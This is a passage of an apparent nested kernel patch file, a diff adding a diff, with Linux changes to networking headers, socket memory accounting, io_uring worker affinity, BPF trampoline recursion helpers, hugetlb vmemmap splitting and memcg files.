++	struct list_head folios[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
+ 	/* the multi-gen LRU sizes, eventually consistent */
+ 	long nr_pages[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
+ 	/* the exponential moving average of refaulted */
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index cc5ed2cf25f65..2feee144fc0ef 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -261,6 +261,14 @@
+ #define SKB_DATA_ALIGN(X)	ALIGN(X, SMP_CACHE_BYTES)
+ #define SKB_WITH_OVERHEAD(X)	\
+ 	((X) - SKB_DATA_ALIGN(sizeof(struct skb_shared_info)))
++
++/* For X bytes available in skb->head, what is the minimal
++ * allocation needed, knowing struct skb_shared_info needs
++ * to be aligned.
++ */
++#define SKB_HEAD_ALIGN(X) (SKB_DATA_ALIGN(X) + \
++	SKB_DATA_ALIGN(sizeof(struct skb_shared_info)))
++
+ #define SKB_MAX_ORDER(X, ORDER) \
+ 	SKB_WITH_OVERHEAD((PAGE_SIZE << (ORDER)) - (X))
+ #define SKB_MAX_HEAD(X)		(SKB_MAX_ORDER((X), 0))
+diff --git a/include/linux/tca6416_keypad.h b/include/linux/tca6416_keypad.h
+index b0d36a9934ccd..5cf6f6f82aa70 100644
+--- a/include/linux/tca6416_keypad.h
++++ b/include/linux/tca6416_keypad.h
+@@ -25,7 +25,6 @@ struct tca6416_keys_platform_data {
+ 	unsigned int rep:1;	/* enable input subsystem auto repeat */
+ 	uint16_t pinmask;
+ 	uint16_t invert;
+-	int irq_is_gpio;
+ 	int use_polling;	/* use polling if Interrupt is not connected*/
+ };
+ #endif
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 1872f570abeda..c286344628dba 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -57,6 +57,7 @@ struct inet_skb_parm {
+ #define IPSKB_FRAG_PMTU		BIT(6)
+ #define IPSKB_L3SLAVE		BIT(7)
+ #define IPSKB_NOPOLICY		BIT(8)
++#define IPSKB_MULTIPATH		BIT(9)
+ 
+ 	u16			frag_max_size;
+ };
+diff --git a/include/net/ip6_fib.h b/include/net/ip6_fib.h
+index 6268963d95994..fa4e6af382e2a 100644
+--- a/include/net/ip6_fib.h
++++ b/include/net/ip6_fib.h
+@@ -472,13 +472,10 @@ void rt6_get_prefsrc(const struct rt6_info *rt, struct in6_addr *addr)
+ 	rcu_read_lock();
+ 
+ 	from = rcu_dereference(rt->from);
+-	if (from) {
++	if (from)
+ 		*addr = from->fib6_prefsrc.addr;
+-	} else {
+-		struct in6_addr in6_zero = {};
+-
+-		*addr = in6_zero;
+-	}
++	else
++		*addr = in6addr_any;
+ 
+ 	rcu_read_unlock();
+ }
+@@ -610,7 +607,10 @@ static inline bool fib6_rules_early_flow_dissect(struct net *net,
+ 	if (!net->ipv6.fib6_rules_require_fldissect)
+ 		return false;
+ 
+-	skb_flow_dissect_flow_keys(skb, flkeys, flag);
++	memset(flkeys, 0, sizeof(*flkeys));
++	__skb_flow_dissect(net, skb, &flow_keys_dissector,
++			   flkeys, NULL, 0, 0, 0, flag);
++
+ 	fl6->fl6_sport = flkeys->ports.src;
+ 	fl6->fl6_dport = flkeys->ports.dst;
+ 	fl6->flowi6_proto = flkeys->basic.ip_proto;
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index a378eff827c74..f0c13864180e2 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -418,7 +418,10 @@ static inline bool fib4_rules_early_flow_dissect(struct net *net,
+ 	if (!net->ipv4.fib_rules_require_fldissect)
+ 		return false;
+ 
+-	skb_flow_dissect_flow_keys(skb, flkeys, flag);
++	memset(flkeys, 0, sizeof(*flkeys));
++	__skb_flow_dissect(net, skb, &flow_keys_dissector,
++			   flkeys, NULL, 0, 0, 0, flag);
++
+ 	fl4->fl4_sport = flkeys->ports.src;
+ 	fl4->fl4_dport = flkeys->ports.dst;
+ 	fl4->flowi4_proto = flkeys->basic.ip_proto;
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index fca3576798166..bca80522f95c8 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -473,15 +473,14 @@ static inline void iptunnel_xmit_stats(struct net_device *dev, int pkt_len)
+ 		u64_stats_inc(&tstats->tx_packets);
+ 		u64_stats_update_end(&tstats->syncp);
+ 		put_cpu_ptr(tstats);
++		return;
++	}
++
++	if (pkt_len < 0) {
++		DEV_STATS_INC(dev, tx_errors);
++		DEV_STATS_INC(dev, tx_aborted_errors);
+ 	} else {
+-		struct net_device_stats *err_stats = &dev->stats;
+-
+-		if (pkt_len < 0) {
+-			err_stats->tx_errors++;
+-			err_stats->tx_aborted_errors++;
+-		} else {
+-			err_stats->tx_dropped++;
+-		}
++		DEV_STATS_INC(dev, tx_dropped);
+ 	}
+ }
+ 
+diff --git a/include/net/ipv6.h b/include/net/ipv6.h
+index e4ceef687c1c2..517bdae78614b 100644
+--- a/include/net/ipv6.h
++++ b/include/net/ipv6.h
+@@ -750,6 +750,11 @@ static inline bool ipv6_addr_v4mapped(const struct in6_addr *a)
+ 					cpu_to_be32(0x0000ffff))) == 0UL;
+ }
+ 
++static inline bool ipv6_addr_v4mapped_any(const struct in6_addr *a)
++{
++	return ipv6_addr_v4mapped(a) && ipv4_is_zeronet(a->s6_addr32[3]);
++}
++
+ static inline bool ipv6_addr_v4mapped_loopback(const struct in6_addr *a)
+ {
+ 	return ipv6_addr_v4mapped(a) && ipv4_is_loopback(a->s6_addr32[3]);
+@@ -1322,7 +1327,7 @@ static inline int __ip6_sock_set_addr_preferences(struct sock *sk, int val)
+ 	return 0;
+ }
+ 
+-static inline int ip6_sock_set_addr_preferences(struct sock *sk, bool val)
++static inline int ip6_sock_set_addr_preferences(struct sock *sk, int val)
+ {
+ 	int ret;
+ 
+diff --git a/include/net/sock.h b/include/net/sock.h
+index d1f936ed97556..fe695e8bfe289 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1049,6 +1049,12 @@ static inline void sk_wmem_queued_add(struct sock *sk, int val)
+ 	WRITE_ONCE(sk->sk_wmem_queued, sk->sk_wmem_queued + val);
+ }
+ 
++static inline void sk_forward_alloc_add(struct sock *sk, int val)
++{
++	/* Paired with lockless reads of sk->sk_forward_alloc */
++	WRITE_ONCE(sk->sk_forward_alloc, sk->sk_forward_alloc + val);
++}
++
+ void sk_stream_write_space(struct sock *sk);
+ 
+ /* OOB backlog add */
+@@ -1401,7 +1407,7 @@ static inline int sk_forward_alloc_get(const struct sock *sk)
+ 	if (sk->sk_prot->forward_alloc_get)
+ 		return sk->sk_prot->forward_alloc_get(sk);
+ #endif
+-	return sk->sk_forward_alloc;
++	return READ_ONCE(sk->sk_forward_alloc);
+ }
+ 
+ static inline bool __sk_stream_memory_free(const struct sock *sk, int wake)
+@@ -1697,14 +1703,14 @@ static inline void sk_mem_charge(struct sock *sk, int size)
+ {
+ 	if (!sk_has_account(sk))
+ 		return;
+-	sk->sk_forward_alloc -= size;
++	sk_forward_alloc_add(sk, -size);
+ }
+ 
+ static inline void sk_mem_uncharge(struct sock *sk, int size)
+ {
+ 	if (!sk_has_account(sk))
+ 		return;
+-	sk->sk_forward_alloc += size;
++	sk_forward_alloc_add(sk, size);
+ 	sk_mem_reclaim(sk);
+ }
+ 
+diff --git a/include/trace/events/fib.h b/include/trace/events/fib.h
+index c2300c407f583..76297ecd4935c 100644
+--- a/include/trace/events/fib.h
++++ b/include/trace/events/fib.h
+@@ -36,7 +36,6 @@ TRACE_EVENT(fib_table_lookup,
+ 	),
+ 
+ 	TP_fast_assign(
+-		struct in6_addr in6_zero = {};
+ 		struct net_device *dev;
+ 		struct in6_addr *in6;
+ 		__be32 *p32;
+@@ -74,7 +73,7 @@ TRACE_EVENT(fib_table_lookup,
+ 				*p32 = nhc->nhc_gw.ipv4;
+ 
+ 				in6 = (struct in6_addr *)__entry->gw6;
+-				*in6 = in6_zero;
++				*in6 = in6addr_any;
+ 			} else if (nhc->nhc_gw_family == AF_INET6) {
+ 				p32 = (__be32 *) __entry->gw4;
+ 				*p32 = 0;
+@@ -87,7 +86,7 @@ TRACE_EVENT(fib_table_lookup,
+ 			*p32 = 0;
+ 
+ 			in6 = (struct in6_addr *)__entry->gw6;
+-			*in6 = in6_zero;
++			*in6 = in6addr_any;
+ 		}
+ 	),
+ 
+diff --git a/include/trace/events/fib6.h b/include/trace/events/fib6.h
+index 6e821eb794503..4d3e607b3cdec 100644
+--- a/include/trace/events/fib6.h
++++ b/include/trace/events/fib6.h
+@@ -68,11 +68,8 @@ TRACE_EVENT(fib6_table_lookup,
+ 			strcpy(__entry->name, "-");
+ 		}
+ 		if (res->f6i == net->ipv6.fib6_null_entry) {
+-			struct in6_addr in6_zero = {};
+-
+ 			in6 = (struct in6_addr *)__entry->gw;
+-			*in6 = in6_zero;
+-
++			*in6 = in6addr_any;
+ 		} else if (res->nh) {
+ 			in6 = (struct in6_addr *)__entry->gw;
+ 			*in6 = res->nh->fib_nh_gw6;
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 411bb2d1acd45..98ac9dbcec2f5 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -181,6 +181,16 @@ static void io_worker_ref_put(struct io_wq *wq)
+ 		complete(&wq->worker_done);
+ }
+ 
++bool io_wq_worker_stopped(void)
++{
++	struct io_worker *worker = current->worker_private;
++
++	if (WARN_ON_ONCE(!io_wq_current_is_worker()))
++		return true;
++
++	return test_bit(IO_WQ_BIT_EXIT, &worker->wqe->wq->state);
++}
++
+ static void io_worker_cancel_cb(struct io_worker *worker)
+ {
+ 	struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+@@ -1340,13 +1350,16 @@ static int io_wq_cpu_offline(unsigned int cpu, struct hlist_node *node)
+ 	return __io_wq_cpu_online(wq, cpu, false);
+ }
+ 
+-int io_wq_cpu_affinity(struct io_wq *wq, cpumask_var_t mask)
++int io_wq_cpu_affinity(struct io_uring_task *tctx, cpumask_var_t mask)
+ {
+ 	int i;
+ 
++	if (!tctx || !tctx->io_wq)
++		return -EINVAL;
++
+ 	rcu_read_lock();
+ 	for_each_node(i) {
+-		struct io_wqe *wqe = wq->wqes[i];
++		struct io_wqe *wqe = tctx->io_wq->wqes[i];
+ 
+ 		if (mask)
+ 			cpumask_copy(wqe->cpu_mask, mask);
+diff --git a/io_uring/io-wq.h b/io_uring/io-wq.h
+index 31228426d1924..2b2a6406dd8ee 100644
+--- a/io_uring/io-wq.h
++++ b/io_uring/io-wq.h
+@@ -50,8 +50,9 @@ void io_wq_put_and_exit(struct io_wq *wq);
+ void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work);
+ void io_wq_hash_work(struct io_wq_work *work, void *val);
+ 
+-int io_wq_cpu_affinity(struct io_wq *wq, cpumask_var_t mask);
++int io_wq_cpu_affinity(struct io_uring_task *tctx, cpumask_var_t mask);
+ int io_wq_max_workers(struct io_wq *wq, int *new_count);
++bool io_wq_worker_stopped(void);
+ 
+ static inline bool io_wq_is_hashed(struct io_wq_work *work)
+ {
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 6d455e2428b90..f413ebed81ab3 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1823,6 +1823,8 @@ fail:
+ 		if (!needs_poll) {
+ 			if (!(req->ctx->flags & IORING_SETUP_IOPOLL))
+ 				break;
++			if (io_wq_worker_stopped())
++				break;
+ 			cond_resched();
+ 			continue;
+ 		}
+@@ -3833,16 +3835,28 @@ static int io_register_enable_rings(struct io_ring_ctx *ctx)
+ 	return 0;
+ }
+ 
++static __cold int __io_register_iowq_aff(struct io_ring_ctx *ctx,
++					 cpumask_var_t new_mask)
++{
++	int ret;
++
++	if (!(ctx->flags & IORING_SETUP_SQPOLL)) {
++		ret = io_wq_cpu_affinity(current->io_uring, new_mask);
++	} else {
++		mutex_unlock(&ctx->uring_lock);
++		ret = io_sqpoll_wq_cpu_affinity(ctx, new_mask);
++		mutex_lock(&ctx->uring_lock);
++	}
++
++	return ret;
++}
++
+ static __cold int io_register_iowq_aff(struct io_ring_ctx *ctx,
+ 				       void __user *arg, unsigned len)
+ {
+-	struct io_uring_task *tctx = current->io_uring;
+ 	cpumask_var_t new_mask;
+ 	int ret;
+ 
+-	if (!tctx || !tctx->io_wq)
+-		return -EINVAL;
+-
+ 	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+@@ -3863,19 +3877,14 @@ static __cold int io_register_iowq_aff(struct io_ring_ctx *ctx,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = io_wq_cpu_affinity(tctx->io_wq, new_mask);
++	ret = __io_register_iowq_aff(ctx, new_mask);
+ 	free_cpumask_var(new_mask);
+ 	return ret;
+ }
+ 
+ static __cold int io_unregister_iowq_aff(struct io_ring_ctx *ctx)
+ {
+-	struct io_uring_task *tctx = current->io_uring;
+-
+-	if (!tctx || !tctx->io_wq)
+-		return -EINVAL;
+-
+-	return io_wq_cpu_affinity(tctx->io_wq, NULL);
++	return __io_register_iowq_aff(ctx, NULL);
+ }
+ 
+ static __cold int io_register_iowq_max_workers(struct io_ring_ctx *ctx,
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 2b44126a876ef..7245218fdbe2b 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1337,12 +1337,12 @@ retry:
+ 		return IOU_OK;
+ 	}
+ 
+-	if (ret >= 0 &&
+-	    io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
++	if (ret < 0)
++		return ret;
++	if (io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
+ 		goto retry;
+ 
+-	io_req_set_res(req, ret, 0);
+-	return (issue_flags & IO_URING_F_MULTISHOT) ? IOU_STOP_MULTISHOT : IOU_OK;
++	return -ECANCELED;
+ }
+ 
+ int io_socket_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 869e1d2a44139..a4084acaff911 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -360,11 +360,12 @@ static void io_apoll_task_func(struct io_kiocb *req, bool *locked)
+ 	if (ret == IOU_POLL_NO_ACTION)
+ 		return;
+ 
++	io_tw_lock(req->ctx, locked);
+ 	io_poll_remove_entries(req);
+ 	io_poll_tw_hash_eject(req, locked);
+ 
+ 	if (ret == IOU_POLL_REMOVE_POLL_USE_RES)
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 	else if (ret == IOU_POLL_DONE || ret == IOU_POLL_REISSUE)
+ 		io_req_task_submit(req, locked);
+ 	else
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 6ffa5cf1bbb86..7b6facf529b8d 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -423,3 +423,20 @@ err:
+ 	io_sq_thread_finish(ctx);
+ 	return ret;
+ }
++
++__cold int io_sqpoll_wq_cpu_affinity(struct io_ring_ctx *ctx,
++				     cpumask_var_t mask)
++{
++	struct io_sq_data *sqd = ctx->sq_data;
++	int ret = -EINVAL;
++
++	if (sqd) {
++		io_sq_thread_park(sqd);
++		/* Don't set affinity for a dying thread */
++		if (sqd->thread)
++			ret = io_wq_cpu_affinity(sqd->thread->io_uring, mask);
++		io_sq_thread_unpark(sqd);
++	}
++
++	return ret;
++}
+diff --git a/io_uring/sqpoll.h b/io_uring/sqpoll.h
+index 0c3fbcd1f583f..36245f1afa5ee 100644
+--- a/io_uring/sqpoll.h
++++ b/io_uring/sqpoll.h
+@@ -27,3 +27,4 @@ void io_sq_thread_park(struct io_sq_data *sqd);
+ void io_sq_thread_unpark(struct io_sq_data *sqd);
+ void io_put_sq_data(struct io_sq_data *sqd);
+ int io_sqpoll_wait_sq(struct io_ring_ctx *ctx);
++int io_sqpoll_wq_cpu_affinity(struct io_ring_ctx *ctx, cpumask_var_t mask);
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 0c44a716f0a24..0c8b7733573ee 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -5135,14 +5135,15 @@ int kern_sys_bpf(int cmd, union bpf_attr *attr, unsigned int size)
+ 		}
+ 
+ 		run_ctx.bpf_cookie = 0;
+-		run_ctx.saved_run_ctx = NULL;
+-		if (!__bpf_prog_enter_sleepable(prog, &run_ctx)) {
++		if (!__bpf_prog_enter_sleepable_recur(prog, &run_ctx)) {
+ 			/* recursion detected */
++			__bpf_prog_exit_sleepable_recur(prog, 0, &run_ctx);
+ 			bpf_prog_put(prog);
+ 			return -EBUSY;
+ 		}
+ 		attr->test.retval = bpf_prog_run(prog, (void *) (long) attr->test.ctx_in);
+-		__bpf_prog_exit_sleepable(prog, 0 /* bpf_prog_run does runtime stats */, &run_ctx);
++		__bpf_prog_exit_sleepable_recur(prog, 0 /* bpf_prog_run does runtime stats */,
++						&run_ctx);
+ 		bpf_prog_put(prog);
+ 		return 0;
+ #endif
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index 30af8f66e17b4..c4381dfcd6b09 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -874,7 +874,7 @@ static __always_inline u64 notrace bpf_prog_start_time(void)
+  * [2..MAX_U64] - execute bpf prog and record execution time.
+  *     This is start time.
+  */
+-u64 notrace __bpf_prog_enter(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter_recur(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	rcu_read_lock();
+@@ -911,7 +911,8 @@ static void notrace update_prog_stats(struct bpf_prog *prog,
+ 	}
+ }
+ 
+-void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_recur(struct bpf_prog *prog, u64 start,
++					  struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -922,8 +923,8 @@ void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_
+ 	rcu_read_unlock();
+ }
+ 
+-u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
++					       struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	/* Runtime stats are exported via actual BPF_LSM_CGROUP
+@@ -937,8 +938,8 @@ u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+ 	return NO_START_TIME;
+ }
+ 
+-void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
++					       struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -947,35 +948,57 @@ void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+ 	rcu_read_unlock();
+ }
+ 
+-u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
++u64 notrace __bpf_prog_enter_sleepable_recur(struct bpf_prog *prog,
++					     struct bpf_tramp_run_ctx *run_ctx)
+ {
+ 	rcu_read_lock_trace();
+ 	migrate_disable();
+ 	might_fault();
+ 
++	run_ctx->saved_run_ctx = bpf_set_run_ctx(&run_ctx->run_ctx);
++
+ 	if (unlikely(this_cpu_inc_return(*(prog->active)) != 1)) {
+ 		bpf_prog_inc_misses_counter(prog);
+ 		return 0;
+ 	}
++	return bpf_prog_start_time();
++}
++
++void notrace __bpf_prog_exit_sleepable_recur(struct bpf_prog *prog, u64 start,
++					     struct bpf_tramp_run_ctx *run_ctx)
++{
++	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
++
++	update_prog_stats(prog, start);
++	this_cpu_dec(*(prog->active));
++	migrate_enable();
++	rcu_read_unlock_trace();
++}
++
++static u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog,
++					      struct bpf_tramp_run_ctx *run_ctx)
++{
++	rcu_read_lock_trace();
++	migrate_disable();
++	might_fault();
+ 
+ 	run_ctx->saved_run_ctx = bpf_set_run_ctx(&run_ctx->run_ctx);
+ 
+ 	return bpf_prog_start_time();
+ }
+ 
+-void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
+-				       struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
++					      struct bpf_tramp_run_ctx *run_ctx)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+ 
+ 	update_prog_stats(prog, start);
+-	this_cpu_dec(*(prog->active));
+ 	migrate_enable();
+ 	rcu_read_unlock_trace();
+ }
+ 
+-u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter(struct bpf_prog *prog,
++				    struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	rcu_read_lock();
+@@ -986,8 +1009,8 @@ u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+ 	return bpf_prog_start_time();
+ }
+ 
+-void notrace __bpf_prog_exit_struct_ops(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start,
++				    struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -1007,6 +1030,36 @@ void notrace __bpf_tramp_exit(struct bpf_tramp_image *tr)
+ 	percpu_ref_put(&tr->pcref);
+ }
+ 
++bpf_trampoline_enter_t bpf_trampoline_enter(const struct bpf_prog *prog)
++{
++	bool sleepable = prog->aux->sleepable;
++
++	if (bpf_prog_check_recur(prog))
++		return sleepable ? __bpf_prog_enter_sleepable_recur :
++			__bpf_prog_enter_recur;
++
++	if (resolve_prog_type(prog) == BPF_PROG_TYPE_LSM &&
++	    prog->expected_attach_type == BPF_LSM_CGROUP)
++		return __bpf_prog_enter_lsm_cgroup;
++
++	return sleepable ? __bpf_prog_enter_sleepable : __bpf_prog_enter;
++}
++
++bpf_trampoline_exit_t bpf_trampoline_exit(const struct bpf_prog *prog)
++{
++	bool sleepable = prog->aux->sleepable;
++
++	if (bpf_prog_check_recur(prog))
++		return sleepable ? __bpf_prog_exit_sleepable_recur :
++			__bpf_prog_exit_recur;
++
++	if (resolve_prog_type(prog) == BPF_PROG_TYPE_LSM &&
++	    prog->expected_attach_type == BPF_LSM_CGROUP)
++		return __bpf_prog_exit_lsm_cgroup;
++
++	return sleepable ? __bpf_prog_exit_sleepable : __bpf_prog_exit;
++}
++
+ int __weak
+ arch_prepare_bpf_trampoline(struct bpf_tramp_image *tr, void *image, void *image_end,
+ 			    const struct btf_func_model *m, u32 flags,
+diff --git a/lib/idr.c b/lib/idr.c
+index 7ecdfdb5309e7..13f2758c23773 100644
+--- a/lib/idr.c
++++ b/lib/idr.c
+@@ -100,7 +100,7 @@ EXPORT_SYMBOL_GPL(idr_alloc);
+  * @end: The maximum ID (exclusive).
+  * @gfp: Memory allocation flags.
+  *
+- * Allocates an unused ID in the range specified by @nextid and @end.  If
++ * Allocates an unused ID in the range specified by @start and @end.  If
+  * @end is <= 0, it is treated as one larger than %INT_MAX.  This allows
+  * callers to use @start + N as @end as long as N is within integer range.
+  * The search for an unused ID will start at the last ID allocated and will
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 184df6f701b48..a90bd265d73db 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -667,12 +667,13 @@ static int kunit_module_notify(struct notifier_block *nb, unsigned long val,
+ 
+ 	switch (val) {
+ 	case MODULE_STATE_LIVE:
+-		kunit_module_init(mod);
+ 		break;
+ 	case MODULE_STATE_GOING:
+ 		kunit_module_exit(mod);
+ 		break;
+ 	case MODULE_STATE_COMING:
++		kunit_module_init(mod);
++		break;
+ 	case MODULE_STATE_UNFORMED:
+ 		break;
+ 	}
+diff --git a/lib/test_meminit.c b/lib/test_meminit.c
+index 60e1984c060fa..0ae35223d7733 100644
+--- a/lib/test_meminit.c
++++ b/lib/test_meminit.c
+@@ -93,7 +93,7 @@ static int __init test_pages(int *total_failures)
+ 	int failures = 0, num_tests = 0;
+ 	int i;
+ 
+-	for (i = 0; i < 10; i++)
++	for (i = 0; i <= MAX_ORDER; i++)
+ 		num_tests += do_alloc_pages_order(i, &failures);
+ 
+ 	REPORT_FAILURES_IN_FN();
+diff --git a/lib/test_scanf.c b/lib/test_scanf.c
+index b620cf7de5035..a2707af2951ab 100644
+--- a/lib/test_scanf.c
++++ b/lib/test_scanf.c
+@@ -606,7 +606,7 @@ static void __init numbers_slice(void)
+ #define test_number_prefix(T, str, scan_fmt, expect0, expect1, n_args, fn)	\
+ do {										\
+ 	const T expect[2] = { expect0, expect1 };				\
+-	T result[2] = {~expect[0], ~expect[1]};					\
++	T result[2] = { (T)~expect[0], (T)~expect[1] };				\
+ 										\
+ 	_test(fn, &expect, str, scan_fmt, n_args, &result[0], &result[1]);	\
+ } while (0)
+diff --git a/mm/hugetlb_vmemmap.c b/mm/hugetlb_vmemmap.c
+index 4962dd1ba4a68..c04214055229b 100644
+--- a/mm/hugetlb_vmemmap.c
++++ b/mm/hugetlb_vmemmap.c
+@@ -36,14 +36,22 @@ struct vmemmap_remap_walk {
+ 	struct list_head	*vmemmap_pages;
+ };
+ 
+-static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
++static int split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ {
+ 	pmd_t __pmd;
+ 	int i;
+ 	unsigned long addr = start;
+-	struct page *page = pmd_page(*pmd);
+-	pte_t *pgtable = pte_alloc_one_kernel(&init_mm);
++	struct page *head;
++	pte_t *pgtable;
++
++	spin_lock(&init_mm.page_table_lock);
++	head = pmd_leaf(*pmd) ? pmd_page(*pmd) : NULL;
++	spin_unlock(&init_mm.page_table_lock);
+ 
++	if (!head)
++		return 0;
++
++	pgtable = pte_alloc_one_kernel(&init_mm);
+ 	if (!pgtable)
+ 		return -ENOMEM;
+ 
+@@ -53,7 +61,7 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 		pte_t entry, *pte;
+ 		pgprot_t pgprot = PAGE_KERNEL;
+ 
+-		entry = mk_pte(page + i, pgprot);
++		entry = mk_pte(head + i, pgprot);
+ 		pte = pte_offset_kernel(&__pmd, addr);
+ 		set_pte_at(&init_mm, addr, pte, entry);
+ 	}
+@@ -65,8 +73,8 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 		 * be treated as indepdenent small pages (as they can be freed
+ 		 * individually).
+ 		 */
+-		if (!PageReserved(page))
+-			split_page(page, get_order(PMD_SIZE));
++		if (!PageReserved(head))
++			split_page(head, get_order(PMD_SIZE));
+ 
+ 		/* Make pte visible before pmd. See comment in pmd_install(). */
+ 		smp_wmb();
+@@ -80,20 +88,6 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 	return 0;
+ }
+ 
+-static int split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+-{
+-	int leaf;
+-
+-	spin_lock(&init_mm.page_table_lock);
+-	leaf = pmd_leaf(*pmd);
+-	spin_unlock(&init_mm.page_table_lock);
+-
+-	if (!leaf)
+-		return 0;
+-
+-	return __split_vmemmap_huge_pmd(pmd, start);
+-}
+-
+ static void vmemmap_pte_range(pmd_t *pmd, unsigned long addr,
+ 			      unsigned long end,
+ 			      struct vmemmap_remap_walk *walk)
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 67b6d8238b3ed..0a403b241718e 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3841,10 +3841,6 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 		case _MEMSWAP:
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
+-		case _KMEM:
+-			/* kmem.limit_in_bytes is deprecated. */
+-			ret = -EOPNOTSUPP;
+-			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+ 			break;
+@@ -5055,12 +5051,6 @@ static struct cftype mem_cgroup_legacy_files[] = {
+ 		.seq_show = memcg_numa_stat_show,
+ 	},
+ #endif
+-	{
+-		.name = "kmem.limit_in_bytes",
+-		.private = MEMFILE_PRIVATE(_KMEM, RES_LIMIT),
+-		.write = mem_cgroup_write,
+-		.read_u64 = mem_cgroup_read_u64,
+-	},
+ 	{
+ 		.name = "kmem.usage_in_bytes",
+ 		.private = MEMFILE_PRIVATE(_KMEM, RES_USAGE),
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index d18296109aa7e..93d6f27dd40b4 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
